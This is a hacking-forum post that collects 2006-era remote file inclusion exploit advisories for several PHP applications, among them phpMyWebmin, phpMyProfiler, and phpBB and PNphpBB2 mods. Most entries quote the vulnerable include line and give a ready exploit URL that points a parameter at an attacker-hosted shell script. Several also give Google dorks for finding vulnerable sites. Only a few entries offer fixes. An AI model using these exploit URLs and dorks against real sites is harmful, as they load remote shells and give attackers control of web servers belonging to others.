AuthorMessage
Ashura
Unstopable
Posts: 370

cant be arsed to post em all in differ topics, so here u go all i see arround with php exploits in 1 place
Code:

2006-09-30   phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities
Rated as : Critical
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln. Code: include("$target/$folder/preferences.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /change_preferences2.php?target=http://SH3LL?
         /create_file.php?target=http://SH3LL?
         /upload_local.php?target=http://SH3LL?
         /upload_multi.php?target=http://SH3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Code:

2006-10-03   phpMyProfiler <= 0.9.6 Remote File Include Vulnerability
Rated as : High Risk
# Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler
http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr
ipt]
PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi
#phpfreaks rulz
# heh tnx

Code:

2006-10-04   phpBB Static Topics <= 1.0 [phpbb_root_path] File Include Vulnerability
Rated as : High Risk
---------------------------------------------------------------------------
phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include
Vulnerability
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpBB Static Topics
version : 1.0
URL : http://www.nivisec.com/downloads/phpbb/static_forums.zip
------------------------------------------------------------------
Exploit:
~~~~~
Variable $phpbb_root_path not sanitized.When register_globals=on an
attacker ca
n exploit this vulnerability with a simple php injection script.
#
http://www.site.com/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~
declare variabel $phpbb_root_path
---------------------------------------------------------------------------
Shoutz:
~~~
# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com

Code:
2006-10-04   phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
Rated as : High Risk
# Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php");
?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top"
align="left"><? include($site_location .
"/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com
 
#phpfreaks again
# heh tnx

Code:

2006-10-04   phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln
Rated as : High Risk
           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'
# Author: SpiderZ
# Admin Topic Action Logging Remote File Inclusion Vulnerability
# Version 0.95 Admin Topic Action Logging
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________
http://site.com/[path]/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://[Evil_script]
-------------------------------------------------------------------------------------
# Download:
http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip
# File: 38 KB
-------------------------------------------------------------------------------------

Code:

PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability
Rated as : High Risk
Yeah, another ZeroDay Smile
Vendor: http://www.pnphpbb.com/
Vulnerable File: includes/functions_admin.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );
Method To Use:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?
How To Fix:
Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}
Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

Code:
phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
Rated as : Moderate Risk
Author: AzzCoder
Vendor: http://www.phpbbxs.eu/
Vulnerable File: includes/functions.php
Vulnerable Code:
//The phpbb_root_path isn't initialize
include_once( $phpbb_root_path .
'./includes/functions_categories_hierarchy.' . $phpEx );
Method To Use:
http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

Code:
phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability
Rated as : High Risk
###########################################################
#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include
Vulnerability(2)
############################################################
#Author: XORON - SHiKaA
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#Code:   include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);
############################################################
#Exploit:
http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?
############################################################
#Greetz: str0ke and AzzCoder ;)
############################################################

Code:
   Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
Rated as : High Risk
#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site :
http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download     
#                                                                     
#Version : All Versions                                           
#                                                       
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vlu Code :
#--------------------------------
#
# if ( !empty($setmodules) )
#{
#    include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_admin_topic_action_logging.' .
$phpEx);
#    $module['Forums']['Action_Logging'] = basename(__FILE__);
#    return;
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com